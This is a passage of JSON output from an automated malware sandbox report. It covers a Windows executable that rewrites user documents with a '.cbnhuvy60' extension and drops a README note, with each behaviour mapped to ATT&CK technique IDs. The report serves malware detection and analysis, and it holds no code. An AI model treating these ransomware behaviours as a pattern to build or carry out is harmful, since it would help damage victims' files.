\"11001200b447e769@ADVAPI32.dll\"\n \"110012004848e769@ADVAPI32.dll\"\n \"120013008c48e769@ADVAPI32.dll\"\n \"12001300e448e769@ADVAPI32.dll\"\n \"14001500386ee769@ADVAPI32.dll\"\n \"14001500506ee769@ADVAPI32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-4", "type": 6, "relevance": 1, "name": "Creates a writable file in a temporary directory", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" created file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\cbNhUvy60.README.txt\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76BB0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-248", "type": 6, "relevance": 2, "name": "Tries to open documents files", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" opens a file %USERPROFILE%\\Downloads\\0YdED8h4YnKljVf.doc (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" opens a file %USERPROFILE%\\Downloads\\1fdX8.pdf (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" opens a file %USERPROFILE%\\Downloads\\35ZarnYhqsU.pdf (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" opens a file %USERPROFILE%\\Downloads\\3CrsgVxPsB.doc (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" opens a file %USERPROFILE%\\Downloads\\59JuNefogVsL0apf.pdf (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has an executable section named \".text\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has an executable section named \".itext\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has an writable section named \".data\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has an writable section named \".pdata\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"cbNhUvy60.README.txt\" - Location: [%APPDATA%\\Mozilla\\Firefox\\Crash Reports\\events\\cbNhUvy60.README.txt]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\wtsapi32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\RstrtMgr.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\netapi32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\SAMCLI.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\LOGONCLI.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\activeds.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\adsldpc.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\ATL.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\mpr.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\gpedit.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\dsuiext.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\NTDSAPI.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\DSROLE.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\DSSEC.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" reads file \"c:\\users\\%osuser%\\scite.session.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" reads file \"c:\\users\\%osuser%\\downloads\\0yded8h4ynkljvf.doc.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" reads file \"c:\\users\\%osuser%\\downloads\\10ybabsxu.mp3.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" reads file \"c:\\users\\%osuser%\\downloads\\1f5wjj2.gif.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" reads file \"c:\\users\\%osuser%\\downloads\\1ftajh.jpg.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" reads file \"c:\\users\\%osuser%\\downloads\\1retqspn.txt.cbnhuvy60\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\TIME ZONES\\ROMANCE STANDARD TIME\\DYNAMIC DST\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA\\ACCESSPROVIDERS\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\wtsapi32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\wtsapi32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\RstrtMgr.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\RstrtMgr.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\ncrypt.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\ncrypt.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\bcrypt.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\bcrypt.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\netapi32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\netapi32.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\netutils.dll\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to touch file \"C:\\Windows\\system32\\netutils.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\winspool.drv\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe.Local\\\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\WINSPOOL.DRV\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\B838571DBC7905CACD42173F5703F2D6799A35EA6346438EF055476CFF7FB3F1.EXE.LOCAL\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\cbNhUvy60.README.txt\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\dotnet.au3.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\scite.session.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\favorites\\windows live\\get windows live.url.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0rer5x.txt.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0yded8h4ynkljvf.doc.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0ylfqjwf0a2hscy9.mp3.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\10ybabsxu.mp3.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1ezru.mp3.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1f5wjj2.gif.cbnhuvy60\"\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" writes file \"c:\\users\\%osuser%\\downloads\\1fdx8.pdf.cbnhuvy60\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"cbNhUvy60.README.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [%APPDATA%\\Mozilla\\Firefox\\Crash Reports\\events\\cbNhUvy60.README.txt]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb5276d0dc1a000030fd7f9a5cf97600f0fd7f48f513004430fd7f00000000400000003f000000150000000030fd7f3cf51300c15cf97660820077150000000030fd7f9a5cf97600f0fd7f60f513005789f8768083007713171175d8eb5276 (UID: 00000000-00006044)\n \"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000200000000000000880000000000000070f51300459dce760000a200000000008000000002000000000014009c1d3a7384f513006c223a7380000000d3223a73dcf03a73a0f51300741d3a73dcf03a7300000000d0f6130000000000 (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"OpenMutexW\" with parameter \"Global\\a68004154e6a15ae1e7e1128a2f18646\" - (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"b838571dbc7905cacd42173f5703f2d6799a35ea6346438ef055476cff7fb3f1.exe\" called 